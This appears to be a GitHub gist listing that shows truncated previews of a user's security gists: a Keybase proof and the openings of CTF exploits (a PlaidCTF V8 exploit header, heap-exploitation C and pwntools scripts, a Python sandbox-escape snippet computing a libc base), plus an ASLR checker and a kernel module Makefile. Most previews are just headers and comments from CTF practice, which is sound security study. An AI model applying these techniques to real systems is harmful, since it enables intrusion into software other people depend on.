I hereby claim:
- I am ducphanduyagentp on github.
- I am dphan0x80 (https://keybase.io/dphan0x80) on keybase.
- I have a public key whose fingerprint is 3796 106E F244 F6C6 EE39 09B3 07A6 7A8D 5C67 96C2
To claim this, I am signing this object:
// | |
// Quick and dirty exploit for the "roll a d8" challenge of PlaidCTF 2018. | |
// N-day exploit for https://chromium.googlesource.com/v8/v8/+/b5da57a06de8791693c248b7aafc734861a3785d | |
// | |
// Scroll down do "BEGIN EXPLOIT" to skip the utility functions. | |
// | |
// Copyright (c) 2018 Samuel Groß | |
// | |
// |
I hereby claim:
To claim this, I am signing this object:
#include <stdio.h> | |
#include <stdlib.h> | |
#define chunksize 0x8 | |
#define fakesize 0x20 | |
#define SIZE_SZ (sizeof(size_t)) | |
#define MALLOC_ALIGN_MASK (2*SIZE_SZ - 1) | |
#define MIN_CHUNK_SIZE 24 /* 64 bit system */ | |
//#define MIN_CHUNK_SIZE 12 /* 32 bit system */ |
#!/usr/bin/env python | |
#-*- coding: utf-8 -*- | |
from pwn import * | |
import re | |
import sys | |
import string | |
import itertools | |
# UAF in IndexCursor |
# import Collection | |
bytearray = ().__class__.__base__.__subclasses__()[5] | |
def p64(addr): | |
x = '{0:016x}'.format(addr) | |
return bytearray.fromhex(x)[::-1] | |
b = Collection.Collection({'1':0x1337}) | |
libc_base = id(b) + 0xe27198 - 0x13e0dd0 |
#!/usr/bin/env python2 | |
# -*- coding: utf-8 -*- | |
# The 300 challenge was a heap challenge that allowed you to make allocations of size 0x300. | |
# You could free allocations and read/write to them even after they got freed. | |
# The tricky part about the challenge was that you don't control the size and can't for example use the usual fastbin techniques. | |
# This exploit overwrites the check_action variable so that the libc doesn't abort on errors anymore. | |
# Afterwards we can get a write-what-where primitive using unsafe unlink. |
'''checkaslr.py: Check for files that opt into ASLR with /DYNAMICBASE, | |
but do not have a relocation table to allow ASLR to function. | |
usage: checkaslr.py <dir> | |
ex: checkaslr.py "C:\Program Files\" | |
requires: pefile <https://github.com/erocarrera/pefile>, which should be | |
installable via: pip install pefile | |
''' |
obj-m += afw.o | |
afw-objs := afw_main.o locate_sct.o ttgl.o | |
ccflags-y := -std=gnu99 -O2 | |
all: | |
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules | |
clean: | |
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean |
#!/usr/bin/env python | |
# | |
# Copyright (c) 2012, Chema Garcia | |
# All rights reserved. | |
# | |
# Redistribution and use in source and binary forms, with or | |
# without modification, are permitted provided that the following | |
# conditions are met: | |
# | |
# * Redistributions of source code must retain the above |